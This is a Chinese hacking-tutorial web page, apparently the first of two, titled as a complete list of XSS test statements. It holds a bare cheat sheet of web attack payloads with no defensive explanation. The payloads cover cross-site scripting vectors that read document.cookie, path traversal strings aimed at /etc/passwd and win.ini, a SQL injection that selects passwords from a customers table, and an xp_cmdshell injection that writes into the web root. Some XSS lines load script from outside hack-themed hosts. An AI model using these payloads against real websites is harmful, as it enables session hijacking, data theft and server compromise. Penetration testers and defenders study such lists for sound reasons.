首页  登陆  注册  博客集  下载频道  网络硬盘  学院论坛  家园
IT学院 网站地图 网站地图
收藏本站 收藏本站
高级搜索 高级搜索
 新闻IT新闻 互联网 微软 黑客新闻 网络网络协议 故障 网络管理 TCP/IP 无线技术 解决方案 黑客技术 漏洞 软件评测 安全资讯
 数据MSsql Oracle Mysql PL/SQL 备份 系统:Linux vista Windows FTP 防火墙 注册表 服务器行情 服务器应用 解决方案 WEB服务器
 墙纸风景壁纸 游戏壁纸 体育壁纸 汽车壁纸 人文壁纸 影视壁纸 广告壁纸 花卉壁纸 节日壁纸 动漫壁纸 明星壁纸 绘画壁纸 月历壁纸
当前位置: > 主页>网络攻防>黑客技术>XSS测试语句大全
热门文章排行
 
热门文章排行 XSS测试语句大全
反击黑客从这里开始
加密三剑客SSL、SET和PG
攻破网络的十二种常用方
sa弱口令强行入侵
Win2000 Server入侵监测
域名欺骗技术实现过程
通用密码后门
UNIX系统后门的安放和日
后门技术及rootkit工具-
精采文章推荐
 
精采文章推荐 小规模DDoS(拒绝服务)用
打造简单隐藏疯狂DDOS攻
用ASP实现反向连接控制
使用perl通过adsi接口导
详细讲解黑客常用的远程
二行代码解决全部网页木
判断cookies注入的js语
Metasploit渗透工具的应
利用Debug Api 获得QQ20
BBSXP绕过过滤继续注入
最新更新文章
 
最新更新文章 PERL铸造多线程+支持中
看黑客怎样汇编创建简单
破解数据库下载漏洞
利用sohu网站URL跳转漏
xdos.exe攻击器下载与使
DDoS攻击教程(3)
DDoS攻击教程(2)
DDoS攻击教程(1)
DOS攻击原理以及常见方
小规模DDoS(拒绝服务)用

XSS测试语句大全

编辑:   来源:  日期:2008-02-05   我要投稿      家园

 以下是引用片段:

  '><script>alert(document.cookie)</script>

  ='><script>alert(document.cookie)</script>

  <script>alert(document.cookie)</script>

  <script>alert(vulnerable)</script>

  %3Cscript%3Ealert('XSS')%3C/script%3E

  <script>alert('XSS')</script>

  <img src="javascript:alert('XSS')">

  %0a%0a<script>alert(\"Vulnerable\")</script>.jsp

  %22%3cscript%3ealert(%22xss%22)%3c/script%3e

  %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

  %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini

  %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

  %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

  %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html

  %3f.jsp

  %3f.jsp

  <script>alert('Vulnerable');</script>

  <script>alert('Vulnerable')</script>

  sql_debug=1

  a%5c.aspx

  a.jsp/<script>alert('Vulnerable')</script>

  a/

  a?<script>alert('Vulnerable')</script>

  "><script>alert('Vulnerable')</script>

  ';exec%20master..xp_cmdshell%20'dir%20 c:%20>%20c:\inetpub\wwwroot\?.txt'--&&

  %22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

  %3Cscript%3Ealert(document. domain);%3C/script%3E&

  %3Cscript%3Ealert(document.domain);%3C/script%3E&SESSION_ID={SESSION_ID}&SESSION_ID=

  1%20union%20all%20select%20pass,0,0,0,0%20from%20customers%20where%20fname=

  ../../../../../../../../etc/passwd

  ..\..\..\..\..\..\..\..\windows\system.ini

  \..\..\..\..\..\..\..\..\windows\system.ini

  '';!--"<XSS>=&{()}

  <IMG SRC="javascript:alert('XSS');">

  <IMG SRC=javascript:alert('XSS')>

  <IMG SRC=javascript:alert('XSS')>

  <IMG SRC=javascript:alert("XSS")>

  <IMG SRC=javascript:alert('XSS')>

  <IMG SRC=javascript:alert('XSS')>

  <IMG SRC=>

  <IMG SRC="jav?ascript:alert('XSS');">

  <IMG SRC="javascript:alert('XSS');">

  <IMG SRC="javascript:alert('XSS');">

  "<IMG SRC=java\0script:alert(\"XSS\")>";' >out

  <IMG SRC=" javascript:alert('XSS');">

  <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>

  <BODY BACKGROUND="javascript:alert('XSS')">

  <BODY ONLOAD=alert('XSS')>

  <IMG DYNSRC="javascript:alert('XSS')">

  <IMG LOWSRC="javascript:alert('XSS')">

  <BGSOUND SRC="javascript:alert('XSS');">

  <br size="&{alert('XSS')}">

  <LAYER SRC="http://xss.ha.ckers.org/a.js"></layer>

  <LINK REL="stylesheet" HREF="javascript:alert('XSS');">

  <IMG SRC='vbscript:msgbox("XSS")'>

  <IMG SRC="mocha:[code]">

  <IMG SRC="livescript:[code]">

  <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

  <IFRAME SRC=javascript:alert('XSS')></IFRAME>

  <FRAMESET><FRAME SRC=javascript:alert('XSS')></FRAME></FRAMESET>

  <TABLE BACKGROUND="javascript:alert('XSS')">

  <DIV STYLE="background-image: url(javascript:alert('XSS'))">

  <DIV STYLE="behaviour: url('http://www.how-to-hack.org/exploit.html');">

  <DIV STYLE="width: expression(alert('XSS'));">

  <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

  <IMG STYLE='xss:expre\ssion(alert("XSS"))'>

  <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

  <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

  <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

  <BASE HREF="javascript:alert('XSS');//">

  getURL("javascript:alert('XSS')")

  a="get";b="URL";c="javascript:";d="alert('XSS');";eval(a+b+c+d);

  <XML SRC="javascript:alert('XSS');">

  "> <BODY ONLOAD="a();"><SCRIPT>function a(){alert('XSS');}</SCRIPT><"

  <SCRIPT SRC="/article/UploadFiles/200608/20060827171609376.jpg"></SCRIPT>

上一页12 下一页


上一篇:没有了  
下一篇:加密三剑客SSL、SET和PGP
 关键字:  
文章评论】 【收藏本文】 【推荐好友】 【打印本文】 【论坛讨论

   相关文章:

   文章评论:(0条)
  
 请留名: 匿名评论   点击查看所有评论
 

  责任编辑:IT学院  声明:刊登此文章是为了传递更多信息,文章内容仅供参考,转载请注明出处。